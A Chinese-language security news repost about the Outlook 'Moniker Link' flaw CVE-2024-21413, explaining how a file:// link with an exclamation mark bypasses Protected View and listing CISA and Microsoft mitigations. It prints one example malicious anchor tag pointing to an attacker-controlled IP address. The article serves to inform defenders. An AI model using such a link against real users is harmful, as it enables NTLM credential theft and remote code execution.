微软Outlook严重漏洞

admin 2025年2月8日00:18:13评论10 views字数 1036阅读3分27秒阅读模式

微软Outlook严重漏洞点击上方蓝字关注我们吧~

微软Outlook严重漏洞

该漏洞由 Check Point 漏洞研究员 Haifei Li 发现并跟踪为 CVE-2024-21413,该漏洞是由于使用易受攻击的 Outlook 版本打开带有恶意链接的电子邮件时输入验证不当造成的。

攻击者获得了远程代码执行能力,该漏洞允许绕过受保护视图(该视图应该通过以只读模式打开来阻止 Office 文件中嵌入的有害内容)并在编辑模式下打开恶意 Office 文件。

一年前修补 CVE-2024-21413 时,Microsoft 警告说,预览窗格是一种攻击媒介,即使在预览恶意制作的 Office 文档时也允许成功利用。

这个安全漏洞(称为 Moniker Link)允许威胁行为者使用 file:// 协议绕过对电子邮件中嵌入的恶意链接的内置 Outlook 保护,并在指向攻击者控制的服务器的 URL 上添加感叹号。

感叹号与随机文本一起添加到文件扩展名之后(在他们的示例中,Check Point 使用了“something”),如下所示:

*<a href="file:///\10.10.111.111testtest.rtf!something">CLICK ME</a>*

CVE-2024-21413 影响多个 Office 产品,包括 Microsoft Office LTSC 2021、Microsoft 365 Apps for Enterprise、Microsoft Outlook 2016 和 Microsoft Office 2019,成功的 CVE-2024-21413 攻击可导致 NTLM 凭据被盗,并通过恶意构建的 Office 文档执行任意代码。

CISA 和 Microsoft 建议立即采取措施来缓解此威胁:

  1. 应用安全补丁:确保所有受影响的产品都使用最新的安全补丁进行更新。

  2. 禁用 NTLM 身份验证:在可行的情况下,减少对 NTLM 身份验证的依赖,以防止凭据被盗。

  3. 监控网络活动:注意与攻击者控制的服务器的异常出站连接。

  4. 教育用户:培训员工识别网络钓鱼企图并避免可疑链接或附件。

  5. 启用高级威胁防护:使用 Microsoft Defender 等安全工具增强安全监控。

    来源:cybersecuritynews

    免责声明

    本公众号所载文章为本公众号原创或根据网络搜索下载编辑整理,文章版权归原作者所有,仅供读者学习、参考,禁止用于商业用途。因转载众多,无法找到真正来源,如标错来源,或对于文中所使用的图片、文字、链接中所包含的软件/资料等,如有侵权,请跟我们联系删除,谢谢!

    微软Outlook严重漏洞

原文始发于微信公众号(网安百色):微软Outlook严重漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月8日00:18:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   微软Outlook严重漏洞https://cn-sec.com/archives/3711952.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息